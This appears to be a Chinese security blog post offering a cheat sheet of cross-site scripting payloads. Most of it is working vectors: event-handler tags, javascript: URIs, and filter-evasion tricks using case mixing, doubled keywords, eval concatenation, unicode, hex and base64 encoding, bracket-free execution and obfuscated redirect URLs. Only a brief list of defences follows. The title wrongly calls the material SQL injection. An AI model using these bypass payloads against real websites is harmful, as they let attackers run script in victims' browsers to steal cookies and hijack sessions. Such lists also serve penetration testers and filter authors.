XSS收藏测试|仅用于SQL注入漏洞,危害性极大
安全不晚,戳蓝字一建关注千云安全小栈
本文约3761字,阅读约4分钟
简述|Sketch✦
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。
这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。
攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。
常用的XSS攻击手段和目的
Common XSS attack means and purpose
盗用cookie,获取敏感信息。
利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。
利用iframe、frame、XMLHttpRequest或上述Flash等方式,以(被攻击)用户的身份执行一些管理动作,或执行一些一般的操作如发微博、加好友、发私信等操作。
利用可被攻击的域受到其他域信任的特点,以受信任来源的身份请求一些平时不允许的操作,如进行不当的投票活动。
在访问量极大的一些页面上的XSS可以攻击一些小型网站,实现DDOS攻击的效果。
一些常见标签
<scirpt>
<scirpt>alert("xss");</script>
<img>
<img src=1 onerror=alert("xss");>
<input>
<input onfocus="alert('xss');">
竞争焦点,从而触发onblur事件
<input onblur=alert("xss") autofocus><input autofocus>
通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<input onfocus="alert('xss');" autofocus>
<details>
<details ontoggle="alert('xss');">
使用open属性触发ontoggle事件,无需用户去触发
<details open ontoggle="alert('xss');">
<svg>
<svg onload=alert("xss");>
<select>
<select onfocus=alert(1)></select>
通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<select onfocus=alert(1) autofocus>
<iframe>
<iframe onload=alert("xss");></iframe>
<video>
<video><source onerror="alert(1)">
<audio>
<audio src=x onerror=alert("xss");>
<body>
<body/onload=alert("xss");>
<body
onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<textarea>
<textarea onfocus=alert("xss"); autofocus>
<keygen>
<keygen autofocus onfocus=alert(1)> //仅限火狐
<marquee>
<marquee onstart=alert("xss")></marquee> //Chrome不行,火狐和IE都可以
<isindex>
<isindex type=image src=1 onerror=alert("xss")>//仅限于IE
利用link远程包含js文件
<link rel=import href="http://127.0.0.1/1.js">
javascript伪协议
<a>
标签
<a href="javascript:alert(`xss`);">xss</a>
<iframe>
标签
<iframe src=javascript:alert('xss');></iframe>
<img>
标签
<img src=javascript:alert('xss')>//IE7以下
<form>
标签
<form action="Javascript:alert(1)"><input type=submit>
其它
<img style="xss:expression(alert('xss''))"> // IE7以下
<div style="color:rgb(''�x:expression(alert(1))"></div> //IE7以下
<style>#test{x:expression(alert(/XSS/))}</style> // IE7以下
<table background=javascript:alert(1)></table> //在Opera 10.5和IE6上有效
/
代替空格
< img / src = "x" / onerror = alert ( "xss" ); >
过滤关键字
大小写绕过
< ImG sRc = x onerRor = alert ( "xss" ); >
双写关键字
< imimgg srsrcc = x onerror = alert ( "xss" ); >
字符拼接
< img src = "x" onerror = "a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)" >
<script>top["al"+"ert"](`xss`);</script>
其它字符混淆
下面举几个简单的例子
可利用注释、标签的优先级等
1.<<script>alert("xss");//<</script>
2.<title><img src=</title>><img src=x onerror="alert(`xss`);"> //因为title标签的优先级比img的高,所以会先闭合title,从而导致前面的img标签无效
3.<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>
编码绕过
< img src = "x" onerror = "alert("xss");" >
< img src = "x" onerror = "eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')" >
< img src = "x" onerror = "eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))" >
<iframe ></iframe>
< img src = "x" onerror = "eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))" >
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
<img src=x onerror=alert('\170\163\163')>
<img onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">
<iframe >
过滤双引号,单引号
<img onerror=alert(`xss`);>
过滤括号
<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
过滤url地址
使用url编码
<img onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`>
使用IP
<img onerror=document.location=`http://2130706433/`>
<img onerror=document.location=`http://0177.0.0.01/`>
<img onerror=document.location=`http://0x7f.0x0.0x0.0x1/`>
//
可以代替
http://
<img onerror=document.location=`//www.baidu.com`>
\\
但是要注意在windows下\本身就有特殊用途,是一个path 的写法,所以\\在Windows下是file协议,在linux下才会是当前域的协议
如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号
<img onerror="document.location=`http://www。baidu。com`">//会自动跳转到百度
如何防止xss:
-
过滤一些危险字符,以及转义 & < > " ' /
等危险字符; -
HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie,攻击者完成 XSS 注入后也无法窃取此Cookie; -
设置CSP(Content Security Policy); -
输入内容长度限制;
-END-
后记
Reference
参考链接
https://blog.csdn.net/lay_loge/article/details/90440207-「lay_loge」https://xz.aliyun.com/t/4067「七友」
END